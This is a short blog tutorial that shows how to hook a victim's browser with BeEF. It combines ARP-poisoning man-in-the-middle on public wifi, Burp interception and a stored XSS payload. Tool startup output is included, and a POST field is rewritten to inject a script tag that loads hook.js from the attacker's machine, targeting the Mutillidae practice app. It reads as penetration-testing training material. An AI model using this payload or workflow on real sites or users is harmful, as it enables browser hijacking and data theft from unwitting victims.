Client Side Attack: BeEF + XSS

Posted on by Unknown
Hi Folks,
Today I want try to use BeEF and to do Client Side Attack. BeEF is short for The Browser Exploitation Framework it is a penetration testing tool that focuses on the web browser.

And for fulnerable web application to do XSS, I use Mutillidae (Web Pen-Test Practice Application) you can download it from here: http://sourceforge.net/projects/mutillidae/

OK, lets do the main action.
The scenario, I'm on public wifi, and I'm already do MiTM using arp poisoning in one of the client(victim) and setup burp suite to listen on port 80 and 443.

First, I'm activate my BeEF application:
root@bt:~# cd /pentest/web/beef
root@bt:/pentest/web/beef# ./beef
[23:51:17][*] Browser Exploitation Framework (BeEF)
[23:51:17]    |   Version 0.4.3.6-alpha
[23:51:17]    |   Website http://beefproject.com
[23:51:17]    |   Run 'beef -h' for basic help.
[23:51:17]    |_  Run 'git pull' to update to the latest revision.
[23:51:18][*] BeEF is loading. Wait a few seconds...
[23:51:18][*] 8 extensions loaded:
[23:51:18]    |   Autoloader
[23:51:18]    |   Demos
[23:51:18]    |   Events
[23:51:18]    |   Requester
[23:51:18]    |   Admin UI
[23:51:18]    |   Proxy
[23:51:18]    |   Console
[23:51:18]    |_  XSSRays
[23:51:18][*] 114 modules enabled.
[23:51:18][*] 2 network interfaces were detected.
[23:51:18][+] running on network interface: 127.0.0.1
[23:51:18]    |   Hook URL: http://127.0.0.1:3000/hook.js
[23:51:18]    |_  UI URL:   http://127.0.0.1:3000/ui/panel
[23:51:18][+] running on network interface: 192.168.0.148
[23:51:18]    |   Hook URL: http://192.168.0.148:3000/hook.js
[23:51:18]    |_  UI URL:   http://192.168.0.148:3000/ui/panel
[23:51:18][*] RESTful API key: 9a9fc7d8f75241c5b4d1a86eb400d81e80bb4adb
[23:51:18][*] HTTP Proxy: http://127.0.0.1:6789
[23:51:18][*] BeEF server started (press control+c to stop)



To get Victim to BeEF panel, I need to insert "hook,js" thats why I need to use XSS for this.
When Victim open web application that vulnerable to XSS in this scenario set-background-color.php I change the $_POST data to insert "hook,js" JavaScript to activate BeEF function.


You can see the last line:
background_color=aaaaaaa&set-background-color-php-submit-button=Set+Background+Color

I change to:
background_color=aaaaaaa<script src="http://192.168.10.20:3000/hook.js" type="text/javascript"></script>&set-background-color-php-submit-button=Set+Background+Color

Then forward the data. After that I open BeEF panel at: http://127.0.0.1:3000/ui/panel


Voila..!! I got the victim Browser.
For more information about BeEF you can go here: http://beefproject.com/

One Response so far.

  1. Anonymous says:
    March 27, 2013 at 3:09 AM

    that is cool thats all i have to say

Leave a Reply